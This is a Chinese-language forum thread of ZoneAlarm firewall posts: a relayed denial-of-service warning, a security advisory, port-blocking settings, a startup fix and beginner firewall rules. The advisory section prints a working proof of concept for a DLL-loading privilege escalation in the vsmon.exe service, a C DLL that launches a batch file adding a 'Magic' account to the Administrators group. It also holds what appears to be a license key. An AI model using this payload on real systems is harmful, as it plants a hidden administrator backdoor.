|
Zone Labs ZoneAlarm Security Suite build 6.1.744.000 漏洞及解決辦法
【警告】ZoneAlarm的所有版本存在拒絕服務漏洞
(轉自防毒論壇) ZoneAlarm remote exploit 文章作者:6mO_HaCk A denial of service exploit has been discovered for all ZoneAlarm verions .. this remote exploit was succesfully tested on windows xp(home and professional edition), windows98 .. so far ZoneLab didnt released any patch for this issue . THe only solution given so far is to close ZoneAlarm until an update is released .. or move to another firewall like Tiny Personal Firewall 下面由我簡單翻譯一下 目前有一個針對所有版本的ZoneAlarm軟體的拒絕服務攻擊程式碼。 這組攻擊程式碼已經成功地在windowsXP 和98等作業系統上通過了測試(註:也就是說這組程式碼能夠成功地對ZA進行攻擊)至今ZONE LAB沒有發怖任何針對這個漏洞的修正檔。 目前唯一的辦法 就是關閉ZA或用其他的防火牆替代。 軟體簡介: 逸凡一直用的網路防火牆,使用很簡單,你只要在安裝時填入你的資料,安 裝完後重新開機,ZoneAlarm 就會自動啟動,幫你執行工作。你可以自由設定所 有程序是否允許連接Internet,利用此種方法來防治一些來路不明的軟體偷偷上 網。最好的方法是鎖住(Lock)網路不讓任何程序通過,只有你核准的軟體才可 以通行無阻。你還可利用它來看看你開機後已經使用多少網路資源,也可以設定 鎖定網路的時間,這麼好用的軟體你一定要親自使用才能感覺到它的威力。 Code:hh11s-pv5cu-batbk-1mvdqe-md0gc0 Zone Labs ZoneAlarm Security Suite build 6.1.744.000 漏洞及解決辦法 用這個版本的ZA軟體的用戶注意了. 受影響系統: Zone Labs ZoneAlarm Security Suite build 6.1.744.000 描述: -------------------------------------------------------------------------------- ZoneAlarm是一款個人電腦防火牆,能保護個人資料和隱私安全。 ZoneAlarm的TrueVector服務在啟動載入DLL時存在問題,攻擊者可能利用此漏洞在主機上執行權限提升攻擊。 在Windows啟動程序中ZoneAlarm的TrueVector服務(vsmon.exe)被設定為自動啟動。TrueVector服務是以本機系統帳號權限執行的,在啟動程序中會試圖載入以下幾個DLL: - VSUTIL_Loc0409_Oem8701.dll - VSUTIL_Oem8701.dll - VSUTIL_Loc0409.dll - vsmon_Loc0409_Oem8701.dll - vsmon_Oem8701.dll - vsmon_Loc0409.dll - VSRULEDB_Loc0409_Oem8701.dll - VSRULEDB_Oem8701.dll - VSRULEDB_Loc0409.dll - av_Loc0409_Oem8701.dll - av_Oem8701.dll - av_Loc0409.dll - zlquarantine_Loc0409_Oem8701.dll - zlquarantine_Oem8701.dll - zlquarantine_Loc0409.dll - zlsre_Loc0409_Oem8701.dll - zlsre_Oem8701.dll - zlsre_Loc0409.dll 在載入工作程序中沒有使用到DLL的完整路徑,而僅使用了DLL的名稱,這可能導致vsmon.exe工作權限提升。 測試方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負! // ===== Start Magic.c ====== // Build Instructions // // gcc -c -DBUILD_DLL magic.c // gcc -shared -o magic.dll -W1,--out-implib,libkernel32.a magic.o #include <windows.h> VOID RunMagicBatFile( VOID ); BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved ) { BOOLEAN bSuccess = TRUE; switch ( fdwReason ) { case DLL_PROCESS_ATTACH: RunMagicBatFile(); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return bSuccess; } VOID RunMagicBatFile() { TCHAR szWinDir[ _MAX_PATH ]; TCHAR szCmdLine[ _MAX_PATH ]; STARTUPINFO si; PROCESS_INFORMATION pi; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); wsprintf( szCmdLine, "%s//system32//cmd.exe /c magic.bat", szWinDir ); ZeroMemory( &si, sizeof( si ) ); si.cb = sizeof( si ); ZeroMemory( &pi, sizeof( pi ) ); CreateProcess( NULL, szCmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi ); CloseHandle( pi.hProcess ); CloseHandle( pi.hThread ); } // ===== End Magic.c ====== // ===== Start Magic.bat ====== net user Magic M@g1c$$ /add net localgroup Administrators Magic /add // ===== End Magic.bat ====== 建議: -------------------------------------------------------------------------------- 廠商修正檔: Zone Labs --------- 目前廠商還沒有提供修正檔或者昇級程序,我們建議使用此軟體的用戶隨時關注廠商的主頁以獲取最新版本: [red]由於是以本機系統權限做為執行的權限.所以NTFS的限制就不太好用了.也不太好起作用了.不過可以使用MVSE8的保護功能或者TINY的文件保護功能來防護[/red] 下面以MVSE8做個比方:  |
ZA防火牆關閉連接阜參數組態
本人的無私奉獻了啊。純屬於個人原創的。(注意:輸入的時候就輸入後面的數位就行了。) 攔截進入UDP 67, 80, 137, 161, 4000-8080 攔截外出UDP 31, 41, 58, 146, 531, 555, 666, 911, 999, 1001, 1010, 1011, 1012, 1015, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1042, 1045, 1090, 1234, 1492, 1600, 1807, 1981, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2023, 2115, 2140, 2565, 2583, 2773, 2774, 2801, 3024, 3129, 3150, 3700, 4092, 4267, 4567, 5000, 5001, 5321, 5400, 5401, 5402, 5555, 5556, 5557, 5569, 5742, 6400, 6670, 6771, 6776, 6939, 6969, 6970, 7000, 7215, 7300, 7301, 7306, 7307, 7308, 7597, 7789, 9872, 9873, 9874, 9875, 9989, 10067, 10167, 10520, 50607, 11000, 11223, 12076, 12223, 12345, 12346, 12361, 12362, 12363, 12631, 13000, 16959, 20034, 21554, 22222, 23456, 23476, 23477, 26274, 27374, 30100, 30101, 30102, 31337, 31785, 31787, 31788, 31789, 31791, 31792, 40421, 40422, 40423, 40425, 40426, 54283, 54320, 54321, 60000 攔截進入TCP 21, 22, 23, 25, 53, 79, 80, 110, 113, 119, 135, 138, 139, 143, 443, 445, 1025, 1026, 1080, 1433, 1723, 3389, 4000, 4444, 5000, 5631, 5632-8080 攔截外出TCP 31, 41, 58, 146, 531, 555, 666, 911, 999, 1001, 1010, 1011, 1012, 1015, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1042, 1045, 1090, 1234, 1492, 1600, 1807, 1981, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2023, 2115, 2140, 2565, 2583, 2773, 2774, 2801, 3024, 3129, 3150, 3700, 4092, 4267, 4567, 5000, 5001, 5321, 5400, 5401, 5402, 5555, 5556, 5557, 5569, 5742, 6400, 6670, 6771, 6776, 6939, 6969, 6970, 7000, 7215, 7300, 7301, 7306, 7307, 7308, 7597, 7789, 9872, 9873, 9874, 9875, 9989, 10067, 10167, 10520, 50607, 11000, 11223, 12076, 12223, 12345, 12346, 12361, 12362, 12363, 12631, 13000, 16959, 20034, 21554, 22222, 23456, 23476, 23477, 26274, 27374, 30100, 30101, 30102, 31337, 31785, 31787, 31788, 31789, 31791, 31792, 40421, 40422, 40423, 40425, 40426, 54283, 54320, 54321, 60000 希望對大家有所說明 。 具體操作:1.開啟ZA控制台。 2.選項防火牆。 3.選項Internet區域安全等級跟信任安全區域等級 自訂 進入後就可以看見了。 推薦大家選項的項目,防火牆等級全部設定為高。 攔截區域安全等級設定 選項進階。進入後,給 攔截所有分段打勾, 啟用ARP打勾, 鎖定主機文件打勾,禁用WINDOWS防火牆打勾. 攔截外出 TCP跟UDP 的連接阜參數為什麼一樣.因為那些連接阜幾乎全部是木馬連接阜.木馬有時候開啟的連接阜資料不一樣,所以我給TCP跟UDP的連接阜全部組態一樣的數位.不會影響到正常適應. |
ZoneAlarm 啟動慢的解決方法之一
首先聲明,這個是別人說的,我自己用了感覺有用,不一定適用所有人 我的防護是瑞星+ZA,一般電腦啟動後,等待幾分鍾,畫面出來了,但點擊圖示沒有任何反映,再等啊等啊,ZA圖示出來了,然後電腦恢復正常了,那個等待時間,我都可以泡上鐵觀音,慢慢品了 後來,看到別人說,主要是我的網路卡沒有設定好,嘿嘿,真的,是這樣的.下面是本人的設定: 1.滑鼠右鍵網路芳鄰, 2.開啟本機連接, 3.點擊tcp/ip ,發現我自己設定ip位址為自動,好就這裡了 4.更改ip位址 192.168.10.2 ,大家根據自己使用的ADSL是什麼局內網位址適當更改,比如 192.168.1.2,子網路遮罩為255.255.255.0, DNS如果知道就輸入,不輸入其實也可以, 5.點擊儲存,然後重新啟動系統看看,哈哈,沒有時間泡功夫茶了,畫面出來,點擊撥號,開CS,我是newbie,嘿嘿 一氣哈成了,(有點作廣告了) 另外,ZA其實不適用那些玩3D遊戲的,會突然佔用系統資源,不過5.x版本不會太佔用,但是....你用嗎 |
【ZAG】菜鳥級ZoneAlarm設置tips (Last updated: 2006-06-16)
## 針對 06年6月10日 Firewall Leak Tester 網站公開 利用 Windows BITS 服務繞過預定防火牆規則的漏洞作出更新。 詳情請閱:June 10 2006 : Windows BITS service bypasses default firewall rules 新手入門設置ZA 防火牆規則 1.請在點擊開始表菜單,在執行輸入" cmd " ,彈出命令提示字元之後,輸入" ipconfig /all " 查詢得到DNS Servers ;  2. 將DNS Servers 加入 信任區域 (如下圖);  3.將環回地址加入信任區域(ZA 6 預定配置,可忽略此步驟)  4.保持程式控制列表內"Generic Host Process for Win32 Services"中"Server" 項"Internet"是打叉;  5. 創建"Expert rules" 應用於"Generic Host Process for Win32 Services";  [size=2]規則如下: Rank: 1; State: Enabled; Action: allow; Name: Allow Trusted; Comments: Allow Trusted Zone; Track: none; Source: My Computer; Destination: Trusted Zone; Protocol: Any; Time: Any; Rank: 2; State: Enabled; Action: allow; Name: Allow DNS; Comments: Allow DNS(UDP); Track: none; Source: [Your DNS server IP address(es)] ; Destination: My Computer; Protocol: UDP; Source Port : 53; Time: Any; Rank: 3; State: Enabled; Action: allow; Name: windows time; Comments: time.windows.com; Track: none; Source: My Computer; Destination: Host/Site [time.windows.com] Protocol: UDP; Source Port : 123; Time: any; Rank: 4; State: Enabled; Action: allow; Name: Other Traffic; Comments: Allow Other TCP Traffic; Track: none; Source: My Computer; Destination: IP Range Destination IP Range 1 Microsoft 64.4.0.0-64.4.63.255 2 Microsoft2 65.52.0.0-65.55.255.255 3 Microsoft3 207.46.0.0-207.46.255.255 4 Microsoft4 208.174.0.0-208.175.127.255 5 Microsoft5 208.175.160.0-208.175.223.255 6 Microsoft6 212.0.0.0-212.255.255.255 7 Microsoft7 213.0.0.0-213.255.255.255 8 Microsoft8 195.0.0.0-195.255.255.255 Host/Site Destination Host name 1 winupdate download.windowsupdate.com 2 rad.msn.com rad.msn.com 3 shared.live.com shared.live.com 4 storage.msn.com storage.msn.com Protocol: Protocol Destination Destination Port TCP HTTP 80 TCP HTTPS 443 Time: any; Rank: 5; State: Enabled; Action: block; Name: Block all; Comments: Block all; Track: Alert and Log; Source: Any; Destination: Any; Protocol: Any; Time: Any; 完畢!安心上網咖!!!高手勿插!!! |
| 所有時間均為台北時間。現在的時間是 07:59 AM。 |
Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.
『服務條款』
* 有問題不知道該怎麼解決嗎?請聯絡本站的系統管理員 *